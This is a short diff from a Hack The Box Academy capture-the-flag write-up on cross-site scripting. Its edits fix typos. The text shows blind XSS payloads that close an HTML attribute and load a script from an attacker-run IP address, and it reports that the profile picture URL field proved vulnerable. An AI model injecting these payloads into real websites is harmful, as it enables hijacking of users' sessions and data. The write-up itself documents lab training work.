DjikstraCS/CTF-Write-Ups/Hack The box/Academy/Cross-Site Scripting (XSS).md

 Payload, username: `Haxx"><script src="http://10.10.15.133/username"></script>`

-Payload , URL: `haxx"><script src="http://10.10.15.133/URL"></script>`
+Payload, URL: `haxx"><script src="http://10.10.15.133/URL"></script>`

 ![](./attachments/Pasted%20image%2020220514165453.png)

-We recieved a request from the web server asking for `/URL`, this means that the `Profile picture URL` field is vulnerable to XSS attacks.
+We received a request from the web server asking for `/URL`, this means that the `Profile picture URL` field is vulnerable to XSS attacks.

 ```bash
 ┌──(kali㉿kali)-[~]